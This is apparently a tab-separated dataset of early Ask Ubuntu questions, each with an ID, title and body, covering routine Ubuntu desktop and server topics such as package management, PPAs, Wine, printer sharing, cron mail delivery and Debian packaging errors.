386	how can i most easily migrate all my apps and settings from one ubuntu install to another ?	i 'll be setting up 10.04 on three computers and do n't want to go through and manually download and configure all the same stuff x3 , as well as selecting all my appearance and windows manager settings x3 . surely there 's a way to produce a script once i 've done the configuring once that i can then run on the second and third computers , thus saving me all that time ?
395	how do i reset my keyboard layout ?	how can i reset my keyboard layout after modifying it with xkbcomp ? is there a way to do this without restarting x ?
400	tips to extend battery life for laptops and notebooks	this question is present as a matter of historical interest . while you are encouraged to help maintain its answers , please understand that `` big list '' questions are not generally allowed on ask ubuntu and will be closed per the faq . it is possible to greatly extend the usage time of a laptop or netbook running on battery by disabling various services and installing various packages . what tricks or tips do people have for getting an extra hour or two out of their batteries . perhaps one tip per answer .
405	why do i need root privileges to umount a drive at the command line , but not in nautilus ? how to change ?	when i insert a thumb drive , media card , or usb hard drive , to unmount it via the command line , i need to use sudo umount /media/the_device but , i can unmount the device in a file manager like nautilus simply by clicking the eject button or using the right-click context menu on the device . what is the rationale for the difference ? how can i change it so that i can unmount from the command line without needing root privileges ? is changing it a bad idea ? edit : in case it has changed , i am running 9.04 . i 've run most versions 5.10 -- 9.04 , and as far as i recall , it has always been this way .
406	how do i map unmapped keys on a keyboard ?	my laptop 's keyboard has keys that do n't do anything when i press them . how would i enable the keys , and add functionality to them ? for example , the mute key does n't do anything at the moment .
417	how do i install kde ?	i want to have both kde and gnome shells on ubuntu . ubuntu has gnome by default . how do i install kde ?
422	what ubuntu server administration books does the community recommend ?	what book would you recommend as a reference for ubuntu server administration ? i 'd like to not limit this to server-edition . i 'm biased toward development environments that need to strike a balance somewhere between desktop & server . one book per answer , please - vote answers up/down as you feel appropriate . if you feel the book is biased towards/good for particular tasks , please mention them .
424	what does `` ubuntu '' mean ?	what does `` ubuntu '' mean , and why did they choose that particular name ?
426	internet explorer 8 in ubuntu	is it possible to get ie8 running in ubuntu ? it seems quite feasible to me , as i had gotten ie7 to run via wine awhile back after reading a blog tutorial . however , for some reason that seems to be broken now , and i 'd like to upgrade it anyway in order to test my web development endeavors more thoroughly .
427	how to run windows xp inside ubuntu	i am trying to convince my wife to switch to ubuntu ( after wanting to reinstall windows for nth time because the computer is too slow ) . one thing that prevent her to do that is that she use several programs only available on windows . i thing that trying to use wine with these programs can be a negative experience , so i want to try running windows inside ubuntu using a virtual machine . it seems that virtualbox is the standard way , but i do n't have any experience with it . is virtualbox the standard way to run windows inside ubuntu ? are there better ways ?
442	is there a way to add mozilla thunderbird to the messaging menu ?	i use thunderbird instead of evolution for my mail client , so i 'd prefer if i could replace evolution with thunderbird in the messaging component of the indicator applet . does anyone know how to do this ?
443	how to remove an uninstalled package 's dependencies ?	i want to install a package ( digikam ) , but it has a lot of dependencies . if i decide i no longer need this software and uninstall it , will the now unnessary dependencies be removed ? if not , how can i do it manually ?
447	how can i see all versions of a package that are available in the archive ?	is there a way i can see all the versions that are in the archives that i have configured in sources.list . i can see the last version of each archive with `` apt-get policy '' , but how can i see all ? is there any way that this can also include ppa and anything in sources.list.d ?
454	what is the proper way to patch wine for a custom ppa ?	i 've been manually applying patches to wine for use on my own machine , but i want to put it in a ppa for my friends and relations . currently i follow this procedure : get the latest source from an upstream ppa via apt-get source use patch to apply my unofficial , unsupported patches . create a package using dpkg-buildpackage -rfakeroot -uc -b this is fine for creating a package that will run on my local machine . however i now want to distribute this custom build to others via a ppa . is this procedure sufficient , or is there a more correct and/or easier to maintain procedure i should be following specifically for wine ?
456	how do i make evolution check and notify new emails , without keeping main ui open ?	how do i make evolution keep checking my emails and notifying in the indicator applet without keeping the main ui open ?
459	something similar to eyefinity ?	is there anything simular to eyefinity for ubuntu ? more the idea of turning 3 smaller monitors into one big monitor thanks
460	how to shutdown the computer when hitting the power button ?	i have a xubuntu lucid 10.04 computer plugged in to my tv . i use the command line to administrate it . right now when i hit the power button it just opens a logout screen . how can i set it up so that i can shut it down by hitting the power button ? i know it has something to do with acpi or acpid . i want answers to be command-line only as i do not have any keyboard or mouse connected to that computer . edit : is n't there a way to modify the default behavior of the xfce4 power manager when pushing the power button ? also instead of using the gui to do so , can i do it by creating/modifying a configuration file ? jbowtie had an interesting answer but i can not find the xfce4-power-manager.xml file . if someone knows where to find that file or how to create it , i would be interested .
463	ftp connection problems in nautilus	i have no trouble connecting to my ftp server by going to places- > connect to server ... i can then browse the ftp site to my heart 's content with nautilus for a few minutes . after a few minutes of inactivity , if i try to bring up a folder on the site , nautilus just displays a blank page . the only remedy is to unmount the ftp site and reconnect . this is quite annoying - is there some timeout issue at play here ? is there some way i can prevent this from happening ?
465	why ubuntu will no longer measure file size unit as byte , megabyte , gigabyte , etc ?	i read on somewhere that ubuntu will no longer use the familiar file size units we all know by now ( kb , mb , gb , tb ) and switch to a different iec standard ( kib , mib , gib , tib ) . if this is true , i would like to know what 's the reasoning behind this change , and the impact ( if any ) this change has , especially with multiplatform applications or applications run with wine .
467	is there an apt-get package for sphinx search ?	i would like to know if there is a package for sphinx search hiding out there somewhere . their download page shows various rpm 's , but i was not able to find anything for ubuntu . the install from source is super easy , but it would be nice to have it under package management .
474	how can i keep a folder synchronized to an external usb hard drive ?	i have a growing music collection which i manually keep in sync with an external usb drive . sometimes i edit their id3 tags , add or delete a file in either the hard drive or the usb drive , and i would like to keep those changes synchronized between both . does ubuntu has something available that would help me with this scenario ? preferably something easy to use with a ui . update : to clarify my question , changes may happen on both the local hard drive or the usb drive , so the sync process must be on both directions .
477	how do i check / modify lvm state on a pre-installed system ?	so i just got a nice little home server ( not 100 % a server , it 's also destined to run a few gui jobs , but , mostly ) configured to my specs , and it came with ubuntu 10.4 pre-installed by the guys who put it together ( who are n't ubuntu specialists , but do that for customers who do n't want to purchase windows ) . now , i 'd like to check ( and perhaps modify ) exactly how they installed it ( maybe it would be wiser to reinstall from scratch , but first i 'd like to understand exactly how it 's configured now , anyway ) . in particular , how do i check if and how lvm is installed/configured ? i 'd prefer a command-line approach , but guis are fine too -- and pointers to docs and tutorials on the subject are welcome too .
481	how do i find the package that provides a file ?	simple enough question : is there some shell command ( or gui method ) i can use that , given the path to a file on my system , tells me what package put it there ? assuming the file did in fact come from a package , that is . bonus question : what if it 's a file that is n't installed on my system ? is there , say , a website that will let me look up a file and see what packages , if any , provide it ?
486	not-so-well-known features of ubuntu	ubuntu always surprises me by making things easier in unexpected ways . but , it is n't always obvious , for instance when i was looking for a tool to rdp into windows , i found that ubuntu already has an pre-installed app called terminal server client which has this functionality . i am sure there are many such hidden things which are not known to the average user . this thread could be used to expose these little gems . edit : maybe the choice of my words was wrong , are there any things which you found were not very obvious ?
493	what do i need to do that i can access google calendar on thunderbird ?	i tried to install the provider plugin for thunderbird , but it said my release was too old . i have the lastest release of thunderbird in the lucid archives .
494	is there a plugin for korganizer that allows me to access google calendar ?	where can i find such a plugin ?
500	how can i play encrypted dvd movies ?	my machine ca n't play encrypted dvds on a fresh install . how do i add this capability ? another useful bit of information would be what programs are best for playing dvds , once i 'm able to do so . see the similar question here . will i be able to play dvd movies from any region ?
501	what 's the easiest way to get started with latex ?	i 'd like to learn and use latex on ubuntu . what packages do i need ? what is the best editor for latex code on ubuntu for a new latex user ? i 'd also like the ability to see the code in one pane and the results in a second pane , if possible -- not necessarily wysiwyg , though .
505	how can i use my garmin device in ubuntu ?	specifically , i have a garmin forerunner 305 ( a gps-enabled , hear-rate-monitor for runners ) . i plug it in to the usb port and it is not recognized by ubuntu at all . i 'd like to be able to have it recognized , so that i can pull the exercise record from the watch . this would allow me to upload it to the garmin connect website , or perhaps use a linux exercise software option . i 'd also appreciate suggestions for exercise software to use with the garmin .
513	any ppas for google 's go language ?	do you know of any urls for ppas of google 's go language ?
515	what is better : win7 host running vmware with ubuntu guest or visa versa ?	i need both running on one computer
517	best rootkit removal tool for a server ?	and what schedule/sysadmin routine is recommended ?
519	how do i write an application install shell script ?	does anyone know how to write a shell script to install a list of applications ? it 's a pain to have to install each application by hand every time i set up a new system . edit : it still asks me do you want to continue [ y/n ] ? . is there a way to have the script input y or for it not to prompt for input ?
522	is there a compelling reason to upgrade from ubuntu 8.04 ( hardy heron ) ?	both my desktop and server installation are okay . am i missing something important that would make an upgrade worth the hassle ?
527	what is stored in the `` /var/lib/dpkg/updates '' folder ?	i 've seen some folks have errors relating to files in /var/lib/dpkg/updates . all i can find about the directory is that the files in it are numbered 0000 , 0001 etc . and that the error messages often mention `` trouble parsing one of the files '' . /var/lib/dpkg/updates folder is empty on my system , so i ca n't see what 's in the files . i 've not been able to find information about what is stored in this directory , only many forum posts and bug reports mentioning the directory . so , what is this directory for ?
529	how to set up an apt repository ?	i would like to set up an apt repository on a server that will provide a couple of packages . is there a way to set one up without installing any software on the server ? how do the files have to be organized ? edit : i must be doing something wrong ... can someone please help me ? i have the repository at http : //quickmediasolutions.com/apt/dists i 'm not sure where or what , but something 's misconfigured . i only currently have one package and it 's for all architectures . here 's what 's been added to my /etc/apt/sources.list : deb http : //quickmediasolutions.com/apt stable main
533	why is the tree command not included in ubuntu server ?	is installing the tree command line utility on ubuntu server has security issues ? it 's not included by default on the server .
534	what are the most important ubuntu sysadmin tasks , and what are the best tools for that ?	recommended tool with schedule ?
537	how to get .net 2.0 sp2 running in wine ?	i just ca n't seem to get the .net 2.0 framework installed using wine / winetricks . i typed winetricks into the terminal , selected dotnet20sp2 , and proceeded to install it . unfortunately , i ca n't get it to work . after accepting the license agreement , it says `` installing '' for about 5 seconds , and then reports : setup error ( yes , that 's all it says . silly microsoft ! ) how should i go about installing it .
540	how do i develop .net apps on ubuntu ?	at college we use microsoft .net for developing applications . i recently switched to ubuntu and would like to know similar tools for making apps on/for ubuntu .
557	how can i fix my problems with fonts in firefox ?	ever since i reinstalled ubuntu a few hours ago , i 've experienced major visual artifacts with smaller font sizes in firefox . the fonts end up looking like this : or even like this : this only occurs in firefox ; other applications are unaffected . it also occurred on the liveusb i used for installation , making me suspect a hardware or driver issue . the output of lshw on my computer is here : http : //pastebin.com/lnst6vet . any idea what might be causing this , or how i can fix it ? ... and `` use google chrome '' is not a valid answer . ; )
561	how do i know if my firewall is on ?	i installed firestarter , and configured my firewall . but i 'm in doubt : on boot , i sometimes see a [ fail ] marker , and to the left , i guess it was something like `` start firewall '' . i ca n't be sure because the message is seen for less than a second , so i wanted to know if there is a way , without starting the whole firestarter software , to know if the firewall is on and working , or not . either a gadget , or better , some console instruction , the exact name of the firewall process/daemon , or bash script , will do . edit : i already tested my computer with the `` shield 's up '' http : //www.grc.com feature , which marks my computer as `` stealth '' , but as i am behind a router , i 'm not surprised . still , apparently , my computer answers to pings ... strange ...
564	is there a way to have debootstrap automatically configure locales ?	i like to use debootstrap for making sparse systems ( usually a base for something embedded ) or paravirtualized xen guests . i 'm familiar with how to tell debootstrap what packages i want beyond the typical minimal base , but i have yet to find the right combination of tools to let me specify and auto generate locales after the base system has been installed . do i need to do this in my own scripts , or is there a way to tell deboostrap what locales i want and have it just generate them ?
565	tips for getting to grips with the command line	when i first migrated from windows to ubuntu , by far the most daunting thing i had to do was use the command line . typing commands is an alien experience when you 've only ever been used to pointing and clicking . when i talk to new ubuntu users , they are often uneasy with the idea of talking directly to their computer . is there a simple and friendly guide to help new users get acquainted with the command line ? do you have any tips to make the experience easier or more fun ?
571	where would i find a ppa for the newest version of gimp ?	does anyone know of a ppa that has the development version of gimp ? i would like to try out the new single window mode .
575	list of free ubuntu books	this question exists because it has historical significance , but it is not considered a good , on-topic question for this site , so please do not use it as evidence that you can ask similar questions here . what free ebooks do you recommend to learn more about ubuntu ? one book per answer , please - vote answers up/down as you feel appropriate . if you feel the book is biased towards/good for particular tasks , please mention them .
579	how do i move the window buttons from left to right ?	how can i move the window buttons to the right ?
583	how can i run ubuntu inside windows 7 ?	i have windows 7 . i want to run ubuntu inside it and do n't want to loose any data.. how can i do this ?
594	list of blogs to learn more about ubuntu	add blogs and websites that are useful in the quest to know/learn more about ubuntu . one blog per answer , please - you can vote answers up/down as you feel appropriate . if you feel the blog is biased towards or is good for particular tasks , please mention them .
601	`` the following packages have been kept back : '' why and how do i solve it ?	i just added a ppa repository for the development version of the gimp , but i get this error the following packages have been kept back : gimp gimp-data libgegl-0.0-0 libgimp2.0 why and how can i solve it so that i can use the latest version instead of the one i have now ?
613	trouble creating a package for my ppa	so i tried following the steps here to create a package to upload to my ppa . i ran dh_make and edited the files . however , when my package gets generated by debuild , none of the programs files show up in the package . here is the output of debuild : ... dpkg-source : warning : ignoring deletion of directory share dpkg-source : warning : ignoring deletion of directory share/pixmaps ... here is what the filesystem looks like : build_root - packagename_1.2.orig.tar.gz - packagename-1.2 - debian - control ... the application is written in python , if that means anything . edit : here is what the packagename_1.2.orig.tar.gz looks like : packagename-1.2 - src - somefile.py - someotherfilefile.py - images - test.png unfortunately , i 'm still struggling ... here is my debian/rules file : # ! /usr/bin/make -f # -*- makefile -*- # uncomment this to turn on verbose mode . # export dh_verbose=1 % : dh $ @ override_dh_auto_build : override_dh_auto_install : ... and here is my package.install file : src/myapp.server /usr/lib/bonobo/servers src/myapp /usr/lib/myapp images/test.png /usr/share/test
615	what 's the difference between wubi and a regular `` alongside windows '' installation ?	at this time , wubi does not work with windows 8 default boot-loader . thus at this point wubi would not work on a new windows 8 machine . citation fom wubiguide question recently i 've learned of wubi , a way to install ubuntu right from windows . besides installing from windows , i would like to know key differences between a regular `` alongside windows '' or dual-boot ubuntu installation and one done with wubi . are there any disadvantages ( for example a performance penalty ) or incompatibilities i should look out for when using wubi ?
617	ipod is not visible to banshee 1.5.0	i have a brand new ipod nano , and if i plug it in to my media center running ubuntu 9.10 , it gets mounted and i can see it in nautilus . banshee , however , does not list it anywhere . under preferences/extensions , i 've checked that the ipod plugin is enabled . rhythmbox could see it okay . i found some forums suggesting uninstalling rythmbox might help , but it has n't . any other suggestions about why banshee wo n't see it ? is the ipod too new ? thanks .
620	setting up a build system for python app	in trying to sort out this issue , i have run into the following problem . i have a python script that gets installed to /usr/lib/ . but i need to get this script into a build system so that i can get it working with my package . any help would be appreciated ... although i 've worked a bit with makefiles when writing c++ applications before , i 've never created any kind of makefile for python files . ( nor do i even know where to start . ) how would i go about setting up a build system for my app ?
622	what 's the best mind mapping software ?	back in the dark days when i used to run windows i used to use mindjet mindmanager and i found it to be very good . since i have been using ubuntu as my main operating system i have been trying to find a replacement mind map software to use but have not had any luck finding a good replacment . so far i have tried vym , kdisset and semantik . i have either found them not to be very good or have a nasty habit of crashing . so i was wondering could anyone recommend good mind mapping software to use under ubuntu ?
629	input language switching keys only accept shift-alt instead of alt-shift	on my ubuntu unr install , for some reason , i 'm only able to switch the input language if i press shift and then alt . this is quite the opposite of what usually works -- on windows and other ubuntu/other linux systems -- where i press alt and then add shift . anyone know why this is ?
631	starting a guest session from the login screen	i was wondering what is the best way to start the guest session from the login screen ( gdm ) . currently , i created a new user called 'ubuntu-guest ' ( has to be something other than 'guest ' ) . then added the following script to the startup applications . # ! /bin/bash /usr/share/gdm/guest-session/guest-session-launch & /usr/bin/gnome-session-save -- logout the problem with this method , is that when you log in as 'ubuntu-guest ' , you have to start up two gnome sessions : one for 'ubuntu-guest ' and one for the actual guest account . please let me know if you have any other better ideas . thanks !
635	how to convert wubi install into regular install ?	i have installed ubuntu on my d : partition using wubi . is there any way in which i can remove my windows from c : drive and move my existing ubuntu installation to c : drive and make it a regular install .
641	how do i set up printer sharing with a windows 7 machine in ubuntu ?	i have a brother hl-2040 plugged into my ubuntu 10.04 machine and an hp deskjet 6540 plugged into a windows 7 machine on the same network . out of the box the windows machine does not see the ubuntu-attached printer and the ubuntu machine does not see the windows-attached printer . i right clicked and shared each printer on its own machine . i selected system -- > administration -- > printing -- > server -- > settings and checked the publish printer and show other printer options . i believe i set up sharing on the windows machine as well . still , neither machine see the other printer . how do i set up printer sharing , so that each machine can see the other printer ?
642	what scientific plotting software is available ?	i am currently doing some experimental work and i have a lot of data to trawl though . i use gnumeric , and it 's very good , but often i feel there has to be something better . ideally i would like the maximum number of features with a minimal learning curve , but really i 'd just like to know if there is something better than gnumeric that i can use for manipulating and plotting data . what would you recommend ?
645	how do you reset a usb device from the command line ?	is it possible to reset the connection of a usb device , without physically disconnecting/connecting from the pc ? specifically , my device is a digital camera . i 'm using gphoto2 , but lately i get `` device read errors '' , so i 'd like to try to do a software-reset of the connection . from what i can tell , there are no kernel modules being loaded for the camera . the only one that looks related is usbhid .
647	parental controls with different settings for different users	does anyone know of a good way to set up some sort of parental controls so that one user account is subject to them , but not another ? a couple of friends of mine use ubuntu and have kids ( 7 to 10 years old ) who use the family computer . they 'd like to have some blocking of adult sites . they 're not going to supervise all the time , which i know might be ideal , but there we go . and they 're not particularly technical , so they do n't want to have to run scripts to turn the parental controls on and off regularly , but they can cope with having different accounts for different people . i have n't found a great way of doing this . i am pretty technical , so i 'm happy to spend some time at the command line to set it up , but then it needs to just work . please do n't just link to dansguardian . if your answer does n't address the different user account aspect , i will vote it down . if you want to talk about general parental controls that apply to all users then please start a new question - i 'm sure that plenty of people would be interested in it , and i 'll link to it from this question .
649	uninstall kubuntu-desktop	i installed kubuntu-desktop using sudo apt-get install kubuntu-desktop but i no longer want to use kde . how do i remove all the packages that were installed by this command ? thank you
654	how do i revert to the pathbar after the address bar is visible in nautilus ?	when using nautilus you can use ctrl+l to display the addressbar . how do you revert back to the pathbar ? is there a shortcut key ?
656	how to move /usr to a new partition ?	my /usr folder needs to get moved to a new partition . how can i do this without erasing the contents ? can this be done while ubuntu is running , or do i need to use the livecd for this ?
657	what support does ubuntu have for the apple magic mouse ?	does ubuntu support the full functionality of the apple magic mouse ? what bluetooth adapters work best ? what are the caveats ?
662	how can i sync my ubuntu one music to an mp3 player ?	is there a way to automatically sync just my ubuntu one music ( and not the rest of my music library ) to my sansa fuze mp3 player ?
669	is it possible to delete files when another filesystem is mounted on the path ?	having just written an answer about moving /usr to a new partition i was wondering about deleting files once a new partition has been mounted . to use the example from the question , is it possible to mount a new partition on /usr and then delete all the files under /usr on the root partition to free up space on the root partition .
671	blurry fonts after upgrading to 10.04	recently i upgraded from 8.04 lts to 10.04 . the previous version had some problems regarding screen settings . x only recognised 1024x768 as resolution of my monitor , mainly because the monitor was not identified correct . with 10.04 the monitor and its resolutions are identified correct and the systems chooses a better resolution . but now the fonts seem blurry . they are hard to read . i tried a larger font size which improves the situation a bit . i also played around with nvidia-settings . if i choose 1024x768 again , the fonts look good . also some resolutions with specific refresh rates seem better . another try i made was to change hinting settings . however the best variant was already chosen . so i run out of ideas for a solution . do you have any hints ? my graphics card is nvidia corporation c68 [ geforce 7050 pv / nforce 630a ] ( rev a2 ) .
674	add options to `` move to '' ( when you right click on a file )	in gnome ( version 2.30.2 ) , when i right click on a file , one of the options is `` move to - > [ home folder , desktop ] '' . is it possible to add other directories to the list of options ? the only information i 've been able to find is this : http : //brainstorm.ubuntu.com/idea/24730/ from that i get the impression that it is not possible .
676	how do i set up ubuntu server 10.04 lts to serve as a samba primary domain controller uses pam modules to authenticate against an ldap server ?	i 'd like to have a samba server that appears as a primary domain controller ( pdc ) to a bunch of windows lab computers . but instead of having the users have accounts with passwords stored on this samba pdc , i 'd like to have all the account information stored on our functioning ldap server . so , when a user logs into a windows lab machine , they can do so with their ldap username and password . if i have to change their password , i just have to do it in the ldap server . the next time they log into this `` proxy pdc , '' they 'll be able to use their new ldap password . i have a functioning ldap server and a server that i can use to create the samba pdc . i 've played around with samba before , but i 've always had to have a local linux account for each user that i wanted to access samba and i had to create a corresponding samba account for each of those users . those are the steps that i 'd like to avoid if possible .
678	clock applet stops after login	i realized a second strange thing after upgrading from 8.04 lts to 10.04 . my ( gnome ) panel contains the clock applet . this applet shows current date and time . the time is not upgraded after i start a gnome session . when i remove the applet and insert it again , it works fine . but at some point it stops again . has anyone seen this ? is there a workaround ? several other people seem to have the same problem , but as far as i saw it they had no solution .
684	where can i find alternatives to ... ?	there has been a couple questions here regarding alternatives to certain programs , and i 'm sure as more people start using ubuntu , and join this site , there will be more people looking for alternatives to programs they used in there previous operating system . therefore i figured i start a thread to list different sites that list alternatives to programs . ( please just post one link per answer ) .
690	what is the difference between ubuntu and its derivatives ?	what different ubuntu derivatives are there ? and what is special with them ?
691	what is ubuntu sso ?	at login.ubuntu.com it says ubuntu single sign on . what are it 's uses ? how is it useful ?
692	how can i contribute to ubuntu ?	does it require technical knowledge ? is it difficult ?
693	what are windicators ?	i heard 10.10 will have windicators , what are they ? how will they look ?
694	why are n't multimedia codecs included by default ?	are there legal reasons for that ?
701	how do i set different settings for different mice ?	i have two different mice ( one is always used on the system , the other is wireless and moves between systems as needed ) . unfortunately , the wireless one is much more sensitive than the wired mouse , and the mouse settings panel does n't seem to have a way to set different settings for different mice .
703	how do you show the desktop in a blink in ubuntu ?	we know you can either click on the show desktop icon or use ctrl+alt+d to ask ubuntu to show the desktop . unfortunately , this does not always show the desktop in one action . sometime , and this is true for at least the last 4 version of the os , it brings up first to the front all the windows , then , with a second click , show you the desktop . this is very annoying , as when you show the desktop it generally to quickly click on a shortcut . to understand what i 'm talking about , open 7 windows , minimize some , bring some to the front , maximize one , then show the desktop . then do that on windows . you 'll see the difference .
704	how do i make nautilus windows stick for drag & drop ?	when you drag and drop a folder with nautilus , you must carefully set both windows on non overlapping areas of your screen , otherwise selecting one folder will bring the windows to the front , hiding the second one . on windows , doing so will stick the explorer.exe windows to the back and let you drag and drop the folder . i suppose it detect a long click to decide whether or not bring the window to the front . is that possible with ubuntu ? now i know that nautilus now has split panels by pressing f3 , but that not handy . most of the time , you open a folder , then decide to copy . with split panel , you must decide , then split the panel and go to the right folder .
710	how do you use a shell other than bash at a terminal as default ?	when you drop to the terminal via applications - > terminal or ctrl+alt+f1 etc . bash is used by default to interpret your commands . if you wish to use another command interpreter ( like zsh or fish ) , how do you get this to start as default ?
713	which language is ubuntu-desktop mostly coded in ?	i heard it is python
721	root running emacs	today , after about 20 minutes of logging in my ubuntu 10.4 , i notice the cpu and hard disk usage going up . top revealed that root was running emacs23 . it is basically the same behavior described at ubuntu forums but there is no answer there . any clue about this ?
723	how to change the format of the date & time displayed in top panel ?	by default date and time is displayed by the clock applet on the top right of the gnome desktop in ubuntu . for me this displays something like `` tue aug 3 , 19:45 '' . i would like to change it to make the date terser and to include e.g. , iso week number - to something like 03/08-19:45-w31.2 is there anyway i can specify a `` format string '' for how the date-time is displayed ?
725	is there a way to have an extended desktop in ubuntu a la windows ?	i have ubuntu 9.10 set up with multiple monitors . unfortunately , the way that ubuntu handles multiple monitors by default in 9.10 is by having a separate desktop displayed on each monitor ( it is not possible to drag a window from one monitor to the other ) . i would like to set it up so that i can move applications from one monitor to the other . is this possible ( does 10.04 support it ) ?
730	how do i set environment variables ?	i 'm trying to set up apache tomcat on my pc , and it wants me to set up an environment variable for catalina_home . does any know how to do this ?
732	how do i make cron email my @ gmail account	i have a couple of cron jobs that somethime produce error output and would like to get a notification in my `` real '' email account , since i do n't use my user 's mailbox in my ubuntu laptop , but cron ( or is it postfix maybe ) keeps trying to email the local root account . i know i can add the mailto variable to the crontab : ricardo @ ricardo-laptop : ~ $ sudo crontab -l mailto=redacted @ gmail.com # m h dom mon dow command */5 * * * * /home/ricardo/mrtg/cfg/run.sh but it does n't seem to pay any attention to it i also tried adding my email to the /etc/aliases file and running newaliases ricardo @ ricardo-laptop : ~ $ cat /etc/aliases # see man 5 aliases for format postmaster : root root : redacted @ gmail.com ricardo : redacted @ gmail.com still , whenever cron wants to send an email it 's still sending to root @ my.domain.com : ricardo @ ricardo-laptop : /var/log $ tail mail.log aug 3 16:25:01 ricardo-laptop postfix/pickup [ 2002 ] : d985b310 : uid=0 from= < root > aug 3 16:25:01 ricardo-laptop postfix/cleanup [ 4117 ] : d985b310 : message-id= < 20100803192501.d985b310 @ ricardo-laptop > aug 3 16:25:01 ricardo-laptop postfix/qmgr [ 2003 ] : d985b310 : from= < root @ 144-68-247-190.fibertel.com.ar > , size=762 , nrcpt=1 ( queue active ) aug 3 16:25:03 ricardo-laptop postfix/smtp [ 4120 ] : d985b310 : to= < root @ 144-68-247-190.fibertel.com.ar > , orig_to= < root > , relay=smtp.gmail.com [ 74.125.157.109 ] :25 , delay=1.5 , delays=0.38/0.02/0.9/0.18 , dsn=5.7.0 , status=bounced ( host smtp.gmail.com [ 74.125.157.109 ] said : 530 5.7.0 must issue a starttls command first . d1sm12275173anc.19 ( in reply to mail from command ) ) any suggestions ? i 'm running ubuntu 10.04 , with everything up-to-date solution ( thanks to ressu ) the problem was with the file /etc/mailname this file was set by the ubuntu installer and had the wrong server-name . once i changed it to match `` ricardo-laptop '' postfix realized the emails were intended for local delivery and started to follow the aliases
737	authentication problem with my ppa	i created a package and uploaded it to my ppa . after it got built , i went to install it , but was faced with this message : ****** @ ******-laptop : ~ $ sudo apt-get install stackapplet reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : stackapplet 0 upgraded , 1 newly installed , 0 to remove and 31 not upgraded . need to get 17.7kb of archives . after this operation , 106kb of additional disk space will be used . warning : the following packages can not be authenticated ! stackapplet install these packages without verification [ y/n ] ? my question is ... why is it warning me about the packages not being verified ? and how can i fix this ?
743	coolest looking terminal irc client	i am looking for a irc client for the terminal that has colors , user list and just generally looks awesome ; ) any recommendations ? there are loads of irc clients in the repositories and i do n't want to download them all to find the best one .
745	trouble creating library package	i am having some trouble creating a package for a shared library . i ran dh_make and edited the files . however , when i go to build the package , i get the following : ****** @ ******-laptop : ~/documents/temp/jsoncpp/jsoncpp-0.5.0 $ debuild dpkg-buildpackage -rfakeroot -d -us -uc dpkg-buildpackage : set cflags to default value : -g -o2 dpkg-buildpackage : set cppflags to default value : dpkg-buildpackage : set ldflags to default value : -wl , -bsymbolic-functions dpkg-buildpackage : set fflags to default value : -g -o2 dpkg-buildpackage : set cxxflags to default value : -g -o2 dpkg-buildpackage : source package jsoncpp dpkg-buildpackage : source version 0.5.0-1 dpkg-buildpackage : source changed by ****** dpkg-buildpackage : host architecture amd64 fakeroot debian/rules clean dh clean dh_testdir dh_auto_clean dh_clean dpkg-source -b jsoncpp-0.5.0 dpkg-source : info : using source format `1.0' dpkg-source : info : building jsoncpp using existing jsoncpp_0.5.0.orig.tar.gz dpkg-source : info : building jsoncpp in jsoncpp_0.5.0-1.diff.gz dpkg-source : info : building jsoncpp in jsoncpp_0.5.0-1.dsc debian/rules build dh build dh_testdir dh_auto_configure dh_auto_build make [ 1 ] : entering directory `/home/******/documents/temp/jsoncpp/jsoncpp-0.5.0' test -d obj || mkdir obj g++ -i ./include -c -o obj/json_reader.o src/lib_json/json_reader.cpp g++ -i ./include -c -o obj/json_writer.o src/lib_json/json_writer.cpp g++ -i ./include -c -o obj/json_value.o src/lib_json/json_value.cpp ar -r libjsoncpp.a obj/json_reader.o obj/json_writer.o obj/json_value.o ar : creating libjsoncpp.a make [ 1 ] : leaving directory `/home/******/documents/temp/jsoncpp/jsoncpp-0.5.0' dh_auto_test fakeroot debian/rules binary dh binary dh_testroot dh_prep dh_installdirs dh_auto_install make [ 1 ] : entering directory `/home/******/documents/temp/jsoncpp/jsoncpp-0.5.0' sudo cp -r include/json -- target-directory=/usr/include error : ld.so : object 'libfakeroot-sysv.so ' from ld_preload can not be preloaded : ignored . cp libjsoncpp.a /usr/lib/libjsoncpp.a cp : can not create regular file `/usr/lib/libjsoncpp.a ' : permission denied make [ 1 ] : *** [ install ] error 1 make [ 1 ] : leaving directory `/home/******/documents/temp/jsoncpp/jsoncpp-0.5.0' dh_auto_install : make -j1 install destdir=/home/******/documents/temp/jsoncpp/jsoncpp-0.5.0/debian/tmp returned exit code 2 make : *** [ binary ] error 29 dpkg-buildpackage : error : fakeroot debian/rules binary gave error exit status 2 debuild : fatal error at line 1340 : dpkg-buildpackage -rfakeroot -d -us -uc failed the problem seems to be here : error : ld.so : object 'libfakeroot-sysv.so ' from ld_preload can not be preloaded : ignored . cp libjsoncpp.a /usr/lib/libjsoncpp.a cp : can not create regular file `/usr/lib/libjsoncpp.a ' : permission denied ... but i have n't the faintest idea what the problem is . the makefile is here if needed .
748	what tools and techniques can i use to make gtk themes ?	i 'm trying to make a new gtk theme using the murrine engine , using humanity ( default in ubuntu 9.10 ) as a template . you can grab the code in http : //github.com/tutuca/themes however , i found cumbersome the process of creating a new theme with it . there is no central starting point . the documentation of both , the engine options ( gtkrc 's and stuff ) , and general theming practices ( the format of the index.theme files , folders , bla bla ) is scarce , how to 's and tutorials are often old or subject to lots of opinionated debate and results confusing ( to me , having a web developer background , at least : - ) . so ... i wanted to ask to the fellows gtk themers and artist out there : which tools you use to create a new theme , and how does your average workflow looks like ?
754	how do i add a program that must be run from within its own directory to the panel or main menu ?	some programs can only be run from within their own directories . if i go to system -- > preferences -- > main menu -- > add item and select the file , it will not work . similarly , if i right click on the panel and choose `` add to panel ... '' , choose `` custom application launcher , '' and then point to the file , it will similarly fail . how can i add a launcher to my panel and an entry in my main menu that will successfully launch this kind of program ?
756	is there a gui in xorg for changing the video driver ?	i was under the impression there was a gui app for changing the xorg video driver . if so , where is it ? i do n't see it in 10.04 .
760	change boot order for wubi	i 've setup ubuntu via wubi recently for a friend and he came back with a complaint : on reboots the windows partition is always selected by default , figured this was just a need to update grub but realized that wubi writes to the windows boot manager and does not use grub . though this is technically a `` windows '' question i was n't able to find a clear answer for this . how to do i modify the boot/selection order for operating systems ( mainly ubuntu via wubi ) on the windows boot manager ?
765	how do i set networking enabled by default ?	when i log into my computer , networking is disabled . i always have to enable it so i can connect to the internet . does anyone know how to set it to enabled by default ?
766	how can i share files over a windows network ?	i have a media computer which i recently reformatted to ubuntu 10.04 . i am probably just missing something obvious but i ca n't figure out how to share folders and files , so that i can browse to them on my windows computers in order to copy files to/from the computer . how do i do this ?
